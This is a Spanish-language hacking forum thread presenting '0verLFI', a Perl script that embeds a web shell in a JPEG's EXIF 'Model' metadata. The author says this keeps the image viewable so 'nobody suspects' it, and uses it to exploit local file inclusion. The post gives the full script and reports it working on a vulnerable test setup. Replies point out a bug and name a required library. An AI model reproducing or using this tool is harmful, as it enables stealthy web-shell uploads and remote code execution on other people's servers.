Código: Seleccionar todo

####################################################
#          0verLFI v0.2 Coded by The X-C3LL        #       
####################################################
#  Se trata de una herramienta bastante sencilla   #
#  para inyectar una shell en una imagen JPEG      #
#  y que esta siga pudiendo ser visualizada        #
#  correctamente, de esta forma nadie sospecha.    #
#  Lo único que hace es meter la shell dentro      #
#  de los metadatos de la foto.                    #
####################################################
#             Gr33tz to Seth & CPH Comunity        #
####################################################
#          HTTP://0VERL0AD.BLOGSPOT.COM            #
####################################################



use Image::ExifTool;

print q(

+-----------------------------------+
   0verLFI v0.1 coded by The X-C3LL  

    Http://0verl0ad.blogspot.com  
+-----------------------------------+

);

die "[-]Usage: perl 0verLFI.pl <FILE> <IMAGE>\n" unless @ARGV == 2;

my $file = $ARGV[0];
my $jpeg = $ARGV[1];
print "[+]Image = $jpeg \n";
print "[+]Shell = $file \n";

open (HANDLE, $file);
@array = <HANDLE>;
my $string = join("\n", @array);


my $tool = Image::ExifTool->new();

$tool->ExtractInfo($jpeg);
$tool->SetNewValue("Model", $string);
$done = $tool->WriteInfo($jpeg);
Simplemente tienen que pasar la imagen a inyectar como argumento:
Imagen


Como podeis comprobar, tras modificar los metadatos la imagen continúa viendose perfectamente:



Imagen




Y si lo testeamos en un entorno local vulnerable veremos que funciona:


Imagen




Autor: The X-C3LL
Fuente: Foro Portal Hacker
Gracias por la info.! lo pondre en practica. Ya que ahorita ando mas metido en esta rama.
http://Corp-51.net --->RIP 2010-2014
Firma eliminada por spam. .l.
Blog: www.blackophn.blogspot.com
Imagen
La herramienta no funciona bien del todo... cuando intentas agregar la shell dentro de unos metadatos que dicha imagen tiene borrados, se genera la imagen de nuevo pero la deja intacta, ni siquiera aumenta el tamaño.

Para que a todo el mundo se le ejecute sin fallos, deberán descargar la biblioteca de "libimage-exiftool-perl", que permite agregar metainformación en archivos multimedia.

Saludos 4n4les! ;)
No importa cuan rápida y avanzada sea la tecnología, la mente humana aún es el procesador más versátil y creativo que hay.
Responder

Volver a “Auditoria Web”